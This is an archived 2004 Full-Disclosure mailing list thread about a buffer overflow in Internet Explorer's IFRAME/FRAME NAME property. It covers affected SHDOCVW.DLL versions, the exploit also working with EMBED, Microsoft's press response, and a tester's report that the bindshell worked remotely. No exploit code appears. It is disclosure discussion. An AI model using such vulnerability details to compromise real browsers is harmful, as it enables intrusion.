lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <418F2783.4090301@schimmetje.com>
From: patryn at schimmetje.com (patryn)
Subject: MSIE <IFRAME> and <FRAME> tag NAME property
 bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))

Berend-Jan Wever wrote:
 > I hope they fixed it by accident, seeing what the other option would 
imply.

Certainly puts all that jive they've been spewing to the press in a 
different perspective.

Microsoft has begun to investigate the Iframe vulnerability and has not 
been made aware of any program designed to exploit the flaw. (You'd 
think they'd monitor the lists - p)

"Upon completion of this investigation, Microsoft will take the 
appropriate action to protect our customers, which may include providing 
a fix through our monthly release process or an out-of-cycle security 
update, depending on customer needs"

"Microsoft is concerned that this new report of a vulnerability in 
Internet Explorer was not disclosed responsibly, potentially putting 
computer users at risk"

http://news.com.com/Exploit+code+makes+IE+flaw+more+dangerous/2100-1002_3-5439370.html

But then again who doesn't like to bash Redmond, I'm curious what the 
"investigation" is turning up though.

patryn


Berend-Jan Wever wrote:
 > Hmmm... MSDN DHTML Reference mentions 6 different flavors of the NAME 
property:
 > 1) For a lot of tags like A, APPLET, IMG, INPUT, etc... this includes 
EMBED
 > 2) FRAME, FRAMESET, IFRAME
 > 3) META
 > 4) namespace
 > 5) PARAM
 > 6) window
 >
 > I figured all the tags mentioned under 2 were affected and the rest 
wasn't. Now I hear <EMBED> is also working ? Somebody might wanna go 
through each and every tag to see which are affected and which aren't.
 >
 > SHDOCVW.DLL version 6.0.2800.1400 and 6.0.2800.1584 are known to be 
vulnerable.
 > SHDOCVW.DLL version 6.00.2900.2518 seems to be immune to the BoF 
(ships with XP PRO SP2).
 >
 > The immune version got me wondering if they knew about the bug ? If 
not, did they expect the code could be buggy and just rewrote it to be 
sure it was safe for SP2 ? Or was there just a code rewrite or another 
reason why the bug got silently fixed...? I hope they fixed it by 
accident, seeing what the other option would imply.
 >
 > Cheers,
 > SkyLined
 >
 > ----- Original Message -----
 > From: "Menashe Eliezer" <menashe@...jan.com>
 > To: "Berend-Jan Wever" <skylined@...p.tudelft.nl>; 
<full-disclosure@...ts.netsys.com>
 > Sent: Sunday, November 07, 2004 23:21
 > Subject: RE: [Full-Disclosure] MSIE <IFRAME> and <FRAME> tag NAME 
property bufferoverflow PoC exploit (was: python does mangleme (with IE 
bugs!))
 >
 >
 >
 >>The published exploit is working also with the <EMBED> tag, and not just
 >>with the <IFRAME> and  the <FRAME> tags.
 >>Finjan's advisory can be found at:
 >>http://www.finjan.com/SecurityLab/AttackandExploitReports/alert_show.asp
 >>?attack_release_id=114
 >>
 >>==
 >>Regards,
 >>Menashe Eliezer
 >>Senior application security architect
 >>Malicious Code Research Center
 >>Finjan Software
 >>http://www.finjan.com/mcrc
 >>
 >>Prevention is the best cure!
 >>
 >>
 >>
 >>-----Original Message-----
 >>From: morning_wood [mailto:se_cur_ity@...mail.com]
 >>Sent: Tuesday, November 02, 2004 3:44 PM
 >>To: Berend-Jan Wever; full-disclosure@...ts.netsys.com;
 >>bugtraq@...urityfocus.com
 >>Subject: Re: [Full-Disclosure] MSIE <IFRAME> and <FRAME> tag NAME
 >>property bufferoverflow PoC exploit (was: python does mangleme (with IE
 >>bugs!))
 >>
 >>bindshell success ( html run from local ) connect from remote success...
 >>this is NASTY
 >>if shellcode modified this will do reverse or exe drop i assume....
 >>
 >>good work,
 >>
 >>Donnie Werner
 >>
 >>
 >>-----------------------------------------------
 >>This message was scanned for malicious content and viruses by Finjan 
Internet Vital Security 1Box(tm)
 >>
 >>_______________________________________________
 >>Full-Disclosure - We believe in it.
 >>Charter: http://lists.netsys.com/full-disclosure-charter.html
 >>
 >
 >
 > _______________________________________________
 > Full-Disclosure - We believe in it.
 > Charter: http://lists.netsys.com/full-disclosure-charter.html
 >

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ